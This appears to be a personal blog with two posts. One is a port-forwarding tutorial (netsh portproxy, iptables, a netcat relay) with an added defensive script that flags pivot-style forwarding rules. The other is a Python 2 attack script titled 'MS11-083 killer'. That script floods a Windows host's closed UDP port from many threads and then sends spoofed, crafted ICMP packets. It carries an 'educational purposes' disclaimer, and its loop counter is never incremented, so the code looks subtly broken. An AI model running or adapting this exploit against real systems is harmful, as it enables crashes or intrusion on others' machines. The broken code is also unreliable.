______ Y ______
My own personal time capsule.
Port forwarding on Windows
August 22, 2012
Port forwarding on Windows sometimes seems like an almost magical task, but it turns out that ports can be forwarded easily by running this command (the interactive netsh prompts are dropped and the command is shown on one line):
netsh interface portproxy add v4tov4 listenport=445 listenaddress=192.168.0.1 connectport=445 connectaddress=192.168.0.2
This will forward port 445 on 192.168.0.1 to 192.168.0.2 on Windows.
The Linux equivalent uses iptables:
> iptables -A PREROUTING -t nat -i eth1 -p tcp --source 192.168.0.5 --dport 8080 -j DNAT --to 192.168.0.2:8080
If neither is available, netcat can be used to relay the incoming stream to a specific host and port (netcat takes the host and port as separate arguments; note that this pipe only carries data one way, from the listener to the target, and does not return replies to the client):
nc -L -p 6555 | nc 192.168.0.2 8080
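Because portproxy rules like the one above survive reboots and are a common way to pivot traffic through a Windows host, an administrator will want to inventory them. The following is an added example, not code from the original post: it parses the output of "netsh interface portproxy show v4tov4" (the output text below is constructed to match the format Windows prints, with made-up entries) and flags rules that relay sensitive ports to another host or listen on every interface. The set of sensitive ports is an assumption to adjust per environment.

```python
import re
from collections import namedtuple

# Constructed sample of "netsh interface portproxy show v4tov4" output.
# The first entry is the 445 forward from the post; the rest are made up.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.0.1     445         192.168.0.2     445
0.0.0.0         3389        10.20.30.40     3389
127.0.0.1       8080        127.0.0.1       9090
"""

PortProxyRule = namedtuple(
    "PortProxyRule", "listen_addr listen_port connect_addr connect_port")

# Assumption: forwarding these ports between hosts usually means pivoting
# (SMB, RDP, RPC, NetBIOS) rather than a local development convenience.
SENSITIVE_PORTS = {445, 3389, 135, 139}

_RULE_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+(\d+)\s+(\d+\.\d+\.\d+\.\d+)\s+(\d+)\s*$")


def parse_portproxy(text):
    """Return the v4tov4 rules found in netsh output, ignoring header lines."""
    rules = []
    for line in text.splitlines():
        m = _RULE_RE.match(line)
        if m:
            rules.append(PortProxyRule(m.group(1), int(m.group(2)),
                                       m.group(3), int(m.group(4))))
    return rules


def suspicious_rules(rules):
    """Pair each suspicious rule with the reasons it was flagged."""
    flagged = []
    for r in rules:
        reasons = []
        if r.connect_port in SENSITIVE_PORTS and not r.connect_addr.startswith("127."):
            reasons.append("relays sensitive port %d to %s" % (r.connect_port, r.connect_addr))
        if r.listen_addr == "0.0.0.0":
            reasons.append("listens on all interfaces")
        if reasons:
            flagged.append((r, "; ".join(reasons)))
    return flagged


if __name__ == "__main__":
    for rule, why in suspicious_rules(parse_portproxy(SAMPLE_NETSH_OUTPUT)):
        print("%s:%d -> %s:%d  [%s]" % (rule.listen_addr, rule.listen_port,
                                        rule.connect_addr, rule.connect_port, why))
```

On a live host, pipe the real netsh output into parse_portproxy instead of the constructed sample.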
MS11-083 killer
January 26, 2012
The following code attempts to exploit MS11-083 by sending specially crafted packets to a closed UDP port (read more here).
import socket
import threading
try:
    from dpkt.ip import IP
    from dpkt.icmp import ICMP
except:
    print "install dpkt if you want this program to run!"

print "[+] MS11-083 killer by Y"
print "[+] contact : If you know me then give me a shout"

############ EDIT THIS #################
UDP_IP = "192.168.93.15"
UDP_PORT = 839
MESSAGE = "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00"
ThreadCount = 32
########################################

print " [+]UDP target IP:", UDP_IP
print " [+]UDP target port:", UDP_PORT
print " [+]UDP payload length:", len(MESSAGE)


def customPing(UDP_IP, repeat):
    # craft custom ping
    dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC"
    ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1)
    icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC))
    ip.data = icmp
    ip.len += len(ip.data)
    print "[+] Building socket for final ping"
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW)
    s.connect((UDP_IP, 1))
    # sending packet
    print "[+] Sending final ping ( debug trap ) "
    for x in range(10):
        s.send(str(ip))


try:
    print "\t[+] Running UDP attack against -> ", UDP_IP, "on port ", UDP_PORT
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setblocking(0)  # set non-blocking mode

    class ThreadClass(threading.Thread):
        def run(self):
            c = 0
            while c < (4294967296 / ThreadCount):  # 2^32 requests to overflow the counter
                s.sendto(MESSAGE, (UDP_IP, UDP_PORT))
            # trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?)
            print "[+] Triggering actual attack "
            customPing(UDP_IP, 20)

    for i in range(ThreadCount):
        t = ThreadClass()
        t.start()
        print "[+] Thread ", i, " is starting and its name is : ", t.getName()
except Exception, e:
    print " [-] Exception occurred, reason : ", e
Note that this code is only for educational purposes and I do not take responsibility for any misuse.